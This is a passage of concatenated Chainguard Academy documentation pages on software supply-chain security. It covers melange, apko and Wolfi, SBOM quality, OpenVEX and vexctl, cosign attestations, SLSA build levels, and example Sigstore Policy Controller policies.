packages. It is part of the open source tooling used for Wolfi, which is the operating system used to power Chainguard Containers. From a single YAML file, users are able to generate multi-architecture apks that can be injected directly into apko builds. The following diagram contains an overview of the apko and melange ecosystem and how they work together to compose apk-based images, using either Wolfi or Alpine as the base system. For more information and up-to-date examples on how to use melange, please refer to the melange repository on GitHub. --- ### apko Overview URL: https://edu.chainguard.dev/open-source/build-tools/apko/overview/ Last Modified: May 2, 2024 Tags: apko, Overview apko is a command-line tool designed to create single-layer container images based on the apk package format. It was so named as it uses the apk package format and is inspired by the ko build tool.
apko is part of the open source toolkit developed by Chainguard to build Chainguard Containers. The following diagram contains an overview of the apko ecosystem and how it interacts with melange for building apk-based images, using either Wolfi or Alpine as the base system. For more information and up-to-date examples on how to use apko, please refer to the apko repository on GitHub. --- ### What Makes a Good SBOM? URL: https://edu.chainguard.dev/open-source/sbom/what-makes-a-good-sbom/ Last Modified: August 4, 2022 Tags: SBOM, Conceptual A software bill of materials, or an SBOM (pronounced s-bomb), is a formal record of the components contained in a piece of software. It is analogous to an ingredients list for a recipe. And it has become recognized as one of the key building blocks of software supply chain security. Proponents rightfully point out that organizations can't secure their software if they don't know what's inside their software. As awareness and adoption of SBOMs have grown, there has been a gradual acknowledgement that not all SBOMs are created equal; some are more or less useful depending on the goals of the SBOM user and the contents of the SBOM. This guide provides some guidance on evaluating the quality of an SBOM, suggesting common use cases, the data fields that support those use cases, and open source SBOM quality tools. Basic SBOM Use Cases and Required SBOM Data Identifying Vulnerable Components: SBOMs can help organizations and individuals know about unfixed vulnerabilities in their software. By providing an inventory of components, an SBOM allows a software maintainer to check whether the versions of their components are associated with any known vulnerabilities. The software maintainer can then update or patch any components with known vulnerabilities. To enable this use case, SBOMs must contain information, at a minimum, about the component name and version. Because there are many different open source software package ecosystems, it is also advantageous to include information about the package ecosystem from which a component originates. This reduces the chances of a false positive when identifying potential vulnerabilities. A package URL (or purl) provides this ecosystem information. Additionally, SBOMs ought to include all transitive dependencies, that is, dependencies of dependencies. Identifying Licenses: SBOMs can also help organizations and individuals use open source software consistent with the licensing terms of all components. By identifying all components and associated licenses, software teams can understand the legal implications of any decision related to incorporating a particular component. Some organizations also wish to track, often for legal or procurement purposes, the "supplier" of a particular component. To enable license analysis, an SBOM must contain information about the license or licenses associated with all components. Additionally, there is a supplier data field that can help organizations understand component suppliers. Ensuring Software Integrity: SBOMs can also help organizations and individuals ensure software integrity, discovering instances of tampering where a party has introduced malicious functionality. Providing checksums for packages or files within the SBOM enables machine-verification of software integrity. Note: There are other SBOM use cases, such as mapping broader ecosystem risks, but this guide currently focuses on these three relatively well-established SBOM use cases.
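To make these use cases concrete, here is a rough sketch of what each one can look like in practice. It assumes an SPDX JSON SBOM saved as sbom.spdx.json and uses the open source grype and jq tools, neither of which is prescribed by this guide:

# Identify vulnerable components by scanning the SBOM instead of the software itself
grype sbom:./sbom.spdx.json

# Identify licenses: list component name, version, and concluded license from the SPDX document
jq -r '.packages[] | [.name, .versionInfo // "", .licenseConcluded // ""] | @tsv' sbom.spdx.json

# Support integrity checks: print any recorded checksums for each package
jq -r '.packages[] | select(.checksums) | .name + " " + .checksums[0].checksumValue' sbom.spdx.json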
Measuring SBOM Quality The tools for measuring SBOM quality — like the overall concept of SBOM quality itself — are nascent. There are currently two tools that are worth watching to evaluate SBOMs. SBOM Scorecard analyzes both major SBOM formats and returns a composite quality score indicating the extent to which an SBOM possesses key fields, including whether the components in the SBOM contain a purl and whether there are licenses associated with each component. NTIA Conformance Checker analyzes whether SPDX SBOM documents possess the data fields associated with the so-called "NTIA minimum elements." The U.S. National Telecommunications and Information Administration "minimum elements" include the data fields deemed essential for basic SBOM use cases, including the identification of vulnerable components and the identification of component licenses. Learn More Check out Chainguard's blog post on "Are SBOMs Any Good?" to see an application of these SBOM quality tools to a dataset of open source project SBOMs. You can also learn about the complications for SBOM quality created by "software dark matter." --- ### What is OpenVex? URL: https://edu.chainguard.dev/open-source/sbom/what-is-openvex/ Last Modified: November 21, 2024 Tags: SBOM, VEX, Conceptual OpenVEX is an open source specification, library, and suite of tools designed to enable software users to eliminate vulnerability noise and focus their security efforts on vulnerabilities that pose an immediate risk. Released by Chainguard in January 2023, it's the first set of open source tools to support the VEX specification championed by the United States National Telecommunications and Information Administration (NTIA) and the Cybersecurity and Infrastructure Security Agency (CISA). With OpenVEX, stakeholders from across the software supply chain can collaborate on identifying and remediating exploitable vulnerabilities and use automation to enable more precise and efficient methods of security management. In this guide, you will learn more about the emerging supply chain security standards that OpenVEX supports, as well as how OpenVEX tooling can help you leverage them in your security management processes. SBOMs and VEX One of the most important ways you can protect your codebase from cyberattacks is to have timely and precise information about whether it contains known vulnerabilities. Unfortunately, many cyberattacks are able to broaden the scope of their damage after a vulnerability is publicly identified because individual software operators and end users are unaware that their codebase contains a known vulnerability and requires a patch. Many codebases are too complex and contain too many dependencies for their maintainers to have a comprehensive awareness of their contents. Incorporating software bills of materials (SBOMs) is a powerful way of improving visibility into your codebase so that vulnerabilities can be identified in a timely manner. When vulnerabilities are made known through security advisories, code owners and other users can refer to their software's SBOM to see if they have dependencies associated with the specified vulnerability. In this way, SBOMs represent a significant step forward in security management by enabling software users to quickly identify vulnerabilities, which can otherwise require a significant amount of labor. For example, one federal agency reportedly spent 33,000 hours responding to the Log4j vulnerability at the expense of other priorities.
Though the SBOM's improvement of visibility can greatly improve an organization's security posture, it can also be accompanied by an overproduction of false positives. In this context, false positives are vulnerabilities that are associated with an organization's codebase but have been determined to not be exploitable in specific circumstances. This increase in false positives can hinder an SBOM's security utility as organizations are tasked with investigating the broadened list of vulnerabilities to see which ones pose genuine threats to their codebase. In cases like this, organizations may once again struggle to efficiently identify and respond to vulnerabilities before it is too late. This is where VEX (Vulnerability Exploitability eXchange) comes in: a VEX document lets a software supplier state whether a known vulnerability actually affects their product and why. When publishing a VEX document for a known software vulnerability, the author assigns the product a status drawn from the following list: NOT AFFECTED — No remediation is required regarding this vulnerability. AFFECTED — Actions are recommended to remediate or address this vulnerability. FIXED — These product versions contain a fix for the vulnerability. UNDER INVESTIGATION — It is not yet known whether these product versions are affected by the vulnerability. An update will be provided in a later release. Once published, downstream software users (such as operators or developers) can use these VEX documents to determine whether they are impacted by a vulnerability and what steps they might need to take to address it. Though VEX documents do not need to be used with an SBOM, together they offer a powerful and efficient way to comprehensively scan your codebase for vulnerabilities that matter. An SBOM helps you know whether you have dependencies associated with a vulnerability, while a VEX document tells you which of those vulnerabilities you can ignore. A further benefit of VEX documents is that they are machine readable, enabling users to integrate them into automated workflows and broader tooling to support efficient security management. VEX has value for stakeholders across the supply chain, enabling collaboration across suppliers, operators, and end users that can save the community significant amounts of time investigating and mitigating vulnerabilities. Software suppliers can use VEX to let their users know when they've already investigated a vulnerability and whether that vulnerability affects the product or if further action needs to be taken by the user. And in the case that end users investigate potential vulnerabilities without a security advisory, they can encode their findings in a VEX document to share with the supplier or track for future or ongoing investigations. How to Leverage VEX and SBOMs with OpenVEX To help software suppliers and users leverage VEX, Chainguard developed OpenVEX, an open source specification, library, and suite of tools based on the VEX standard. Developed in collaboration with CISA's VEX Working Group, OpenVEX is the first format to meet the VEX Minimum Requirements and is designed to be lightweight in order to help support community adoption. A specification OpenVEX documents are JSON-LD files that capture the minimal requirements for VEX as defined by the VEX working group organized by CISA.
You can think of the VEX minimal requirements as the “specification of specifications”, and the OpenVEX format as a lightweight, embeddable, integration-friendly spec that complies with the VEX specification. VEX documents are composed of metadata (such as the author and timestamp) and a series of statements that link together a software product (with an identifier that can be traced to an SBOM, such as a Package URL), a vulnerability (using a vuln identifier such as CVE or OSV) , and one of the four impact statuses defined by VEX (“not affected”, “affected”, “fixed”, and “under investigation”). For example, an OpenVEX document with one statement could be written like this: { "@context": "https://openvex.dev/ns", "@id": "https://openvex.dev/docs/example/vex-9fb3463de1b57", "author": "Wolfi J Inkinson", "role": "Document Creator", "timestamp": "2023-01-08T18:02:03.647787998-06:00", "version": "1", "statements": [ { "vulnerability": "CVE-2023-12345", "products": [ "pkg:apk/wolfi/git@2.39.0-r1?arch=armv7", "pkg:apk/wolfi/git@2.39.0-r1?arch=x86_64" ], "status": "fixed" } ] } The OpenVEX specification details additional information you can include in an OpenVEX document. For example, certain statuses require additional statement information. A statement with a not_affected status must include a status justification or an impact_statement describing why the product is not affected. A statement with a not_affected status might be written like this: { "vulnerability": "CVE-2023-12345", "products": [ "pkg:apk/wolfi/product@1.23.0-r1?arch=armv7", ], "status": "not_affected", "justification": "component_not_present", "impact_statement": "The vulnerable code was removed with a custom patch" } These additional fields allow users to include valuable context and justification for VEX statements that can help users prioritize vulnerabilities and know what further action they need to take. You can learn more about the OpenVEX Specification in the OpenVEX repo. A Go library The project has a Go library (openvex/go-vex) that lets projects generate, transform and consume OpenVEX files. It enables the ingestion of VEX metadata expressed in other VEX implementations. You can learn more about go-vex in the OpenVEX repo. A set of tools OpenVEX is also committed to building out tools that will allow software authors and consumers to work with VEX metadata. The first project in this initiative is vexctl, a CLI to create, merge and attest VEX documents. This tool can also be used to apply VEX documents to scanner results in order to filter out false positives. 
For example, you can create a VEX document using a vexctl create command like the following:

```sh
vexctl create --product="pkg:apk/wolfi/git@2.38.1-r0?arch=x86_64" \
  --vuln="CVE-2014-123456" \
  --status="not_affected" \
  --justification="inline_mitigations_already_exist"
```

This code snippet will create the following OpenVEX document:

```json
{
  "@context": "https://openvex.dev/ns/v0.2.0",
  "@id": "https://openvex.dev/docs/public/vex-783356508926ad84f48fa51480d2ed85476160dd3d4169eb0024c346edd1f10b",
  "author": "Unknown Author",
  "timestamp": "2024-11-21T15:52:42.58376093-08:00",
  "version": 1,
  "statements": [
    {
      "vulnerability": {
        "name": "CVE-2014-123456"
      },
      "timestamp": "2024-11-21T15:52:42.583761761-08:00",
      "products": [
        {
          "@id": "pkg:apk/wolfi/git@2.38.1-r0?arch=x86_64"
        }
      ],
      "status": "not_affected",
      "justification": "inline_mitigations_already_exist"
    }
  ]
}
```

Or, to filter out vulnerabilities from security scanner results that are fixed or not exploitable, you can use the vexctl filter command. In this example, scan_results.sarif.json is the file with the scanner results and vex_data.csaf contains the VEX information:

```sh
vexctl filter scan_results.sarif.json vex_data.csaf
```

This command will return output showing vulnerabilities from the scanner that are not resolved by the VEX document. To learn about other commands and capabilities of the vexctl tool, visit the OpenVEX repo.

Learn More

OpenVEX is actively evolving to support VEX adoption across the community, and will continue building out tooling and adjusting its specification to meet community needs. To learn more about VEX, check out related resources on Chainguard’s blog:

- Reflections on Trusting VEX (or when humans can improve SBOMs)
- Putting VEX to work
- Understanding the Promise of VEX
- What is VEX and Why Should I Care?

You can also read more about VEX use cases in this report published by the Cybersecurity and Infrastructure Security Agency.

---

### The Differences between SBOMs and Attestations

URL: https://edu.chainguard.dev/open-source/sbom/sboms-and-attestations/
Last Modified: March 19, 2023
Tags: Cosign, SBOM, Conceptual

One of the first steps to improving your software supply chain security is to establish a process for creating quality Software Bills of Materials (SBOMs). An SBOM is a formal record that contains the details and supply chain relationships (such as dependencies) of the components used in building software. Cosign — a part of the Sigstore project — supports software artifact signing, verification, and storage in an OCI (Open Container Initiative) registry. The cosign command line tool offers two subcommands that you can use to associate an SBOM with a container image and then upload them to a registry: cosign attach and cosign attest. However, these commands don’t work the same way. This guide outlines the differences between these two subcommands and provides guidance for when you might want to use one over the other.

SBOMs vs. Attestations

An SBOM is essentially an electronic packing slip: it’s a list of all the components that went into making a given piece of software. But unless you have some indication of when the software was produced, who produced it, and how it was produced, then you can’t say with any certainty that the components listed in the SBOM are actually part of the software you’re running.
An attestation allows the end users or consumers of a software artifact (in the context of this guide, an SBOM) to verify — independently of the producer — that the contents of the artifact haven’t been changed since it was produced. It also requires software producers to provide verifiable proof of the quality of their software. Put differently, an attestation is a written assurance of a software artifact’s provenance, or the verifiable information about the artifact describing where, when, and how it was produced. You can think of an attestation as a proclamation that “software artifact X” was produced by “person Y” at “time Z”. Because of this extra provenance information, attestations are generally seen as being more trustworthy than SBOMs since you can identify who signed them and when.

Both cosign attest and cosign attach associate an artifact with an image and upload it to a registry. However, cosign attest generates an in-toto attestation while cosign attach does not. cosign attest then attaches it to the provided image and uploads it to a registry as an OCI artifact with a .att extension. In the following example, image.sbom is an SBOM file that was previously created, $IMAGE is the image the SBOM will be attached to, and cosign.key is the signer’s private key.

```sh
cosign attest --key cosign.key --predicate image.sbom $IMAGE
```

Note that after creating an attestation, you can verify it with Cosign’s verify-attestation subcommand.

```sh
cosign verify-attestation $IMAGE
```

cosign attach, on the other hand, only attaches an SBOM to an image and uploads it to a registry. In this case the SBOM isn’t signed, meaning that there’s no way to confidently verify its authenticity.

```sh
cosign attach sbom --sbom image.sbom $IMAGE
```

This will upload the SBOM to the registry as an OCI artifact with a .sbom extension. Be aware that there is also the cosign sign command. After running cosign attach to attach an SBOM and upload it to a registry, you can then run cosign sign to sign the SBOM, and upload the signature to the registry as a separate OCI artifact, this time with the .sig extension. If you’d like to learn more about working with SBOMs and Cosign, we encourage you to check out our tutorial on How to Sign an SBOM with Cosign.

A note on generating SBOMs

There are many tools available today — both proprietary and open source — that allow you to generate SBOMs. However, these tools do not generate SBOMs in the same way or at the same point in the development process. As with signed versus unsigned SBOMs, an organization may find SBOMs generated by one tool to be more trustworthy than those from others. For example, SBOMs generated from source code can be valuable. But ultimately, you have no way of knowing whether the image has been tampered with between the time the SBOM was generated and the time you actually run the image.

apko is a command-line tool that allows users to build container images using a declarative language based on YAML. When building a container image, apko will generate an SBOM outlining each of the apks it uses to build it. When combined with melange, an apk builder tool that uses declarative pipelines to create apk packages, these tools can serve as a good starting point for a secure container image factory. Check out “Secure Your Software Factory with melange and apko” to learn more.

---

### What is SLSA?
URL: https://edu.chainguard.dev/open-source/slsa/what-is-slsa/ Last Modified: June 12, 2023 Tags: SLSA, Conceptual SLSA (pronounced “salsa”), or Supply chain Levels for Software Artifacts, is a security framework consisting of standards and controls that prevent tampering, improve integrity, and secure packages and infrastructure. While cyberattacks like SolarWinds and Codecov have demonstrated the importance of protecting software from tampering and malicious compromise, the complexity of the software development lifecycle can leave many feeling unable to adequately understand or respond to these specific security issues. Released by Google’s Open Source Security Team in 2021, SLSA was created as a framework to help software creators understand where and how they can harden their supply chain security practices, and help software consumers evaluate the integrity of a software product or component before they decide to use it. SLSA was also designed around the creation of verifiable metadata, so that software consumers can set automated policies to prevent the deployment of code that does not meet their preferred SLSA level. Today, SLSA is a vendor-neutral project supported by the Open Source Security Foundation and is actively evolving its standards and supporting tools with industry input. In this guide, you will learn about SLSA tracks, levels, and security requirements, as well as emerging tools that can help you meet these requirements. SLSA Tracks and Levels Evolving from v0.1, SLSA v1.0 shifted to its current track structure, dividing requirements for key pillars of supply chain security into separate categories. Previously, the single unnamed SLSA track captured elements of different areas, making achieving high levels of SLSA difficult if a build fell short in some aspects. By restructuring SLSA into multiple tracks, organizations can focus on hardening one aspect of their security without being blocked by the status of a different track. SLSA levels are designed to function as a ladder so that developers and organizations can incrementally work towards achieving a security posture appropriate for their risk profile. Some software projects may take more time to advance up the ladder, so this framework offers a piecemeal approach that may be more realistic (and encouraging) than trying to meet all of the requirements at once. As of this writing, SLSA offers a build track with three ascending levels of security, each containing a set of security requirements that expands on those of the prior level. The SLSA project has proposed adding additional tracks in a prospective version. Note that these tracks, levels, and/or their requirements may shift with the release of future SLSA versions. Build Track Focusing on an artifact’s provenance, the build track outlines three levels designed to provide verification that artifacts meet build expectations. Establishing provenance gives consumers information about who built an artifact, what inputs were used, and what process was used to build it. Comparing an artifact’s expected and actual provenance can help to stop supply chain threats in their tracks by ensuring artifacts are constructed from trustworthy materials, by credible sources. SLSA recommends its SLSA Provenance format for meeting provenance expectations. Build Level 1 Provenance showing how the package was built Level 1 sets a foundation for working towards subsequent build track levels. 
Software production methods must be consistent so standard expectations for future builds are set. In addition, artifact provenance containing information on the build must be automatically generated by the build platform. Software producers are responsible for distributing provenance metadata with package releases. While Level 1 does not prevent tampering, fulfilling its requirements represents an important first step in securing your software supply chain. Labeling your software with this level can also help consumers make informed decisions about whether it has been sufficiently secured and verified for their applications. For more information on getting started with reaching Level 1, visit SLSA’s quick start guide. Build Level 2 Signed provenance, generated by a hosted build platform Adding to the requirements of Level 1, Level 2 requires the use of a hosted build service like GitHub Actions, Google Cloud Build, or Travis CI rather than a developer’s local environment. The hosted service must sign the provenance it generates through the use of digital signatures, a method of verifying the authenticity and integrity of the software artifact. The stricter requirements for Level 2 help provide more protection against software tampering and enable greater levels of trust that the provenance data is accurately represented. For more information, check out SLSA’s guide on reaching level 2. Build Level 3 Hardened build platform As the highest level of the build track, Level 3 aims to increase trust and harden infrastructure through a variety of requirements designed to meet specific threats. The requirements are as follows: Isolated: The build steps must be run in an isolated environment without risk of influence from other build processes, such as a container or VM, that has been created specifically for the build. Environments must not be reused. Unforgeable: It must be impossible for the build service’s users to falsify provenance information. All provenance information must be generated by the build service in a trusted control plane, except for noted exceptions. Generating provenance compliant with Level 3 requirements can help end users verify the integrity of the software before implementing it. Recently, SLSA released the open source SLSA 3 Container Generator for GitHub Actions that helps ease the process by allowing you to build automated provenance generation into your container workflows. To learn more about how it works, visit the General availability of SLSA 3 Container Generator for GitHub Actions announcement blog post. You can also check out SLSA’s guide on reaching level 3. SLSA Tools and Practices The SLSA framework and its supporting tools and practices are still actively evolving. Some of the previously listed level requirements can be met using popular build and version control systems. More specific requirements may require additional tooling, and SLSA hosts some supporting tools in its GitHub repositories. As mentioned in the description of Level 3, SLSA released a tool for automating provenance generation with GitHub Actions in February 2023. To verify the SLSA provenance of a piece of software, you can use the slsa-verifier tool, which can verify a provenance generated by the slsa-github-generator tool or Google Cloud Build. Other tools, like Sigstore’s open source Policy Controller allow you to create policies around SLSA requirements in your Kubernetes cluster. 
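To make the verification step more concrete, here is a hedged sketch of checking provenance with the slsa-verifier tool mentioned above. The artifact name, provenance file, and source repository below are illustrative placeholders rather than values from this guide, and the exact flags may differ between slsa-verifier releases.

```sh
# Verify that an artifact's provenance was generated for the expected source
# repository (file names and repository URI are placeholders).
slsa-verifier verify-artifact my-app.tar.gz \
  --provenance-path my-app.intoto.jsonl \
  --source-uri github.com/example-org/my-app
```

If verification succeeds, the tool confirms that the provenance is authentic and matches the stated source, which is the signal an admission controller or release policy can act on.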
Developers are also encouraged to include the corresponding SLSA level badge (Level 1, Level 2, Level 3) in their README once their codebase meets the level’s requirements.

Learn more

In this guide, you learned how SLSA helps secure the software supply chain, the requirements for its three build track security levels, and some of the tools used to implement or confirm these levels. This knowledge will help you work towards achieving SLSA levels for your software projects, assess external software based on its SLSA levels, and use admissions controllers to set SLSA-based policies in your codebase. While SLSA provides a strong framework for verifying the authenticity and integrity of software, it is important to note that it does not protect against every type of supply chain attack. For example, SLSA requirements cannot prevent attacks enabled through vulnerable code, vulnerable build platforms, or collusion between high-level actors. Still, SLSA offers a powerful framework for defending against common supply chain threats, and will likely emerge as a standard component of modern software as tooling and community adoption evolves. To learn more about SLSA, you can visit the SLSA website, read an in-depth overview of SLSA requirements, or explore the SLSA repository on GitHub.

---

### apko FAQs

URL: https://edu.chainguard.dev/open-source/build-tools/apko/faq/
Last Modified: July 31, 2024
Tags: apko, FAQ

Do I need to understand apko to use Chainguard Containers? No. Chainguard built apko as part of its open source tooling around the Wolfi operating system. While you can check out the project on GitHub and learn more, it’s not a prerequisite for using Chainguard Containers.

How are apko images defined? apko images are defined declaratively using a YAML file. apko was designed this way to facilitate reproducible builds — run apko twice, and you’ll get the same output.

Does apko provide SBOMs? Yes, apko builds include high-quality SBOMs (software bills of materials) for all builds. This is a key feature of the tooling that Chainguard has developed to ensure that users can trust the software they are running.

Can I use apko images with Docker? Yes, images built with apko are fully OCI compliant and can be used with any container runtime that supports the OCI image format.

Can I mix Wolfi and Alpine package repositories to create my apko build environment? No, it’s not possible to mix Wolfi apks with Alpine apks.

Can I execute arbitrary commands in apko builds such as in RUN steps in Dockerfiles? No, you can’t execute arbitrary commands in apko builds. apko provides directives for creating users and setting up directories and permissions, but any additional steps necessary at build time, such as the installation of packages and execution of shell commands, must be defined in apk packages that should be included in the list of build dependencies. This is an implementation feature to allow for reproducible builds and high-quality SBOMs.

---

### Example Policies

URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/chainguard-enforce-policy-examples/
Last Modified: August 19, 2024
Tags: Open Source, Procedural, Policy, policy-controller, Reference, SBOM

The Sigstore Policy Controller allows users to create their own security policies that can be enforced on Kubernetes clusters. Here are a few example policies to help you get started. You may also review the Sigstore Policy Controller documentation.
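Keep in mind that the Policy Controller only evaluates workloads in namespaces that have opted in to enforcement. As a rough sketch of how you might exercise one of the example policies below (assuming the Policy Controller is already installed, and using the default namespace and an illustrative filename):

```sh
# Opt the "default" namespace in to policy enforcement.
kubectl label namespace default policy.sigstore.dev/include=true

# Apply one of the example ClusterImagePolicy manifests below,
# saved locally as signed-keyless.yaml (filename is illustrative).
kubectl apply -f signed-keyless.yaml
```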
In particular, we encourage you to review the Policy Controller documentation relating to the Admission of images to learn how to admit images through the cluster image policy. Policy enforcing signed containers apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: signed-keyless spec: images: # All images - glob: "**" authorities: - keyless: url: https://fulcio.sigstore.dev ctlog: url: https://rekor.sigstore.dev Example using Chainguard Containers from Chainguard’s registry: ... images: - glob: cgr.dev/chainguard/** ... An example using Docker Hub images: ... images: - glob: "index.docker.io/*" - glob: "index.docker.io/*/*" ... An example using Google Cloud Registry: ... images: - glob: gcr.io/your-image-here/* ... Policy enforcing signer identity through an OIDC provider and subject apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: enforce-signer-oidc spec: images: - glob: "**" authorities: - keyless: identities: # <<<-- REPLACE the following with your OIDC provider & subject --> # - issuer: https://token.actions.githubusercontent.com subject: https://github.com/chainguard-dev/gke-demo/.github/workflows/release.yaml@refs/heads/main An alternate issuer and subject: ... - issuer: https://accounts.google.com subject: your-gmail@gmail.com Policy enforcing that images have a signed SPDX SBOM attestation from a custom key This policy asserts that all images must have a signed SPDX SBOM attestation from a custom key. apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: custom-key-attestation-sbom-spdxjson spec: images: - glob: gcr.io/your-image-here/* authorities: - name: custom-key key: data: | -----BEGIN PUBLIC KEY----- ... -----END PUBLIC KEY----- attestations: - name: must-have-spdxjson predicateType: spdxjson policy: type: cue data: | predicateType: "https://spdx.dev/Document" Set the POLICY and IMAGES environment variables appropriately, pointing to the sample policy and the image you would like to test. POLICY="policies/custom-key-attestation-sbom-spdxjson.yaml" Generate an SPDX SBOM, then attach the SBOM to your image: cosign attest --type spdxjson Next, sign it with a private key (for example, one located in a keys directory as in keys/cosign.key). export COSIGN_PASSWORD="" cosign attest --yes --type spdxjson \ --predicate sboms/example.spdx.json \ --key keys/cosign.key \ "${IMAGE}" Policy enforcing that releases are signed by GitHub Actions apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: image-is-signed-by-github-actions spec: images: # This is the release v0.3.0 - glob: "gcr.io/projectsigstore/policy-webhook@sha256:d1e7af59381793687db4673277005276eb73a06cf555503138dd18eaa1ca47d6" authorities: - keyless: # Signed by Fulcio url: https://fulcio.sigstore.dev identities: # Matches the Github Actions OIDC issuer - issuer: https://token.actions.githubusercontent.com # Matches a specific GitHub workflow on main branch. Here we use the # Sigstore policy controller example testing workflow as an example. 
subject: "https://github.com/sigstore/policy-controller/.github/workflows/release.yaml@refs/tags/v0.3.0" Policy allowing trusted GKE images apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: gke-trusted spec: images: - glob: gke.gcr.io/** - glob: gcr.io/gke-release/* authorities: - static: action: pass Enforce that cert-manager is signed apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: certmanager-signed spec: images: - glob: quay.io/jetstack/cert-manager-* authorities: - key: data: | -----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAsZZKaaIRjOpzbiWYIDKO yry9XGBqAfve1iOGmt5VO1jpjNoEseT6zewozHfWTM7osxayy2WjN8G+QV39MlT3 Vxo91/31g+Zcq8KcvxG+iB8GRaD9pNgLmghorv+eYDiPYMO/+fhsLImyG5WEoPct MeCBD7umZ/A2t96U9DQxVDqQbTHlsNludno1p1wsgRnfUM3QHexNljDvJg5FcDMo dCpVLpRNvbw0lbJVfybJ4siJ5o/MmXzy0QCJpw+yMIqvqMc8qgKJ1yooJtuTVF4t 4/luP+EG/oVIiSWCFeRMqYdbJ3R+CJi+4LN7vFNYQM1Q/NwOB52RteaR7wnqmcBz qSYK32MM8xdPCQ5tioWwnPTRbPZuzsZsRmJsKBO9JUrBYdDntZX1xY5g4QNSufxi QgJgJSU7E4VGMvagEzB1JzvOr6A/qNFCO1Z6JsA3jw3cJLV1rSHfxqfSXBACTLDf 6bOPWRILRKydTJA6uLKNKmo1/nFm3jvd5tHKOjy4VAQLJ/Vx9wBsAAiLa+06veun Oz3AJ9sNh3wLp21RL11u9TuOKRBipE/TYsBYp8jpIyWPXDSV+JcD/TZqoT8y0Z6S 0damfUmspuK9DTQFL2crpeaqJSG9RA+OuPZLxGD1IMURTsPJB7kXhPtmceeirBnw sVcRHHDitVt8oO/x4Wus1c0CAwEAAQ== -----END PUBLIC KEY----- hashAlgorithm: sha512 Enforce that Chainguard agent is signed apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: chainguard-agent-is-signed spec: images: - glob: us.gcr.io/prod-enforce-fabc/** authorities: - ctlog: url: https://rekor.sigstore.dev keyless: identities: - issuer: https://token.actions.githubusercontent.com subject: https://github.com/chainguard-dev/mono/.github/workflows/.release-drop.yaml@refs/heads/main - issuer: https://token.actions.githubusercontent.com subject: https://github.com/chainguard-dev/mono/.github/workflows/.build-drop.yaml@refs/heads/main url: https://fulcio.sigstore.dev Enforce that Google’s distroless images are signed apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: google-distroless-signed spec: images: - glob: gcr.io/distroless/static* authorities: - ctlog: url: https://rekor.sigstore.dev keyless: identities: - issuer: https://accounts.google.com subject: keyless@distroless.iam.gserviceaccount.com url: https://fulcio.sigstore.dev Enforce that Istio images are signed apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: istio-signed spec: images: - glob: index.docker.io/istio/* authorities: - key: data: | -----BEGIN PUBLIC KEY----- MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEej5bv2n2vOecKineYGWwq1WaQa7C 7HTEVN+BkNI4D1+66ufzn1eGTrbaC9dceJqCAkhp37vMxhWOrGufpBUokg== -----END PUBLIC KEY----- --- ### Wolfi Overview URL: https://edu.chainguard.dev/open-source/wolfi/overview/ Last Modified: May 2, 2024 Tags: Wolfi, Overview Wolfi is a community Linux undistro designed for the container and cloud-native era. Chainguard started the Wolfi project to build Chainguard Containers, our collection of curated distroless images that meet the requirements of a secure software supply chain. This required a Linux distribution with components at the appropriate granularity and with support for glibc. Building our own undistro also allows us to ensure packages have full provenance and metadata for supporting modern supply-chain security needs. 
Why Undistro

We call Wolfi an undistro because unlike a typical Linux distribution designed to run on bare-metal, Wolfi is a stripped-down distro designed for the cloud-native era. It doesn’t have a kernel of its own, instead relying on the environment (such as the container runtime) to provide one. This separation of concerns in Wolfi means it is adaptable to a range of environments. Wolfi is the base we use to build Chainguard Containers, our open source distroless images that are available free of charge.

Wolfi Features

Wolfi, whose name was inspired by the world’s smallest octopus, has some key features that differentiate it from other distributions that focus on container/cloud-native environments:

- Provides a high-quality, build-time SBOM as standard for all packages
- Packages are designed to be granular and independent, to support minimal images
- Uses the proven and reliable apk package format
- Fully declarative and reproducible build system
- Designed to support glibc

Wolfi enables Chainguard to solve the software supply chain security problem from the outside in. It gives developers the secure-by-default base they need to build software, it scales to support organizations running massive environments, and it provides the control needed to fix most modern supply chain threats. Wolfi builds all packages directly from source, allowing us to fix vulnerabilities or apply customizations that improve the supply chain security posture of everything from compilers to language package managers.

Quickstart

This site’s Wolfi section contains full information on Wolfi and how to build Wolfi packages, but if you would like to quickly review how to work with Wolfi, try the wolfi-base image. You can run it with:

```sh
docker run -it cgr.dev/chainguard/wolfi-base
```

This should start a Wolfi container where you can explore the file system and investigate which packages are available. This container is intentionally minimal - it includes the filesystem for Wolfi, a package manager (apk) and a shell, but not much else. You will need to use apk to install any tools you need. Here is an example session:

```
docker run -it cgr.dev/chainguard/wolfi-base
ce557598406a:/# cat /etc/os-release
ID=wolfi
NAME="Wolfi"
PRETTY_NAME="Wolfi"
VERSION_ID="20230201"
HOME_URL="https://wolfi.dev"
ce557598406a:/# apk update
fetch https://packages.wolfi.dev/os/aarch64/APKINDEX.tar.gz
[https://packages.wolfi.dev/os] OK: 15046 distinct packages available
ce557598406a:/# curl
/bin/sh: curl: not found
ce557598406a:/# apk add curl
(1/5) Installing libbrotlicommon1 (1.0.9-r3)
(2/5) Installing libbrotlidec1 (1.0.9-r3)
(3/5) Installing libnghttp2-14 (1.55.1-r0)
(4/5) Installing libcurl-openssl4 (8.2.1-r0)
(5/5) Installing curl (8.2.1-r0)
OK: 13 MiB in 19 packages
ce557598406a:/# curl google.com
...
```

---

### Getting Started with melange

URL: https://edu.chainguard.dev/open-source/build-tools/melange/getting-started-with-melange/
Last Modified: August 1, 2024
Tags: melange, Procedural

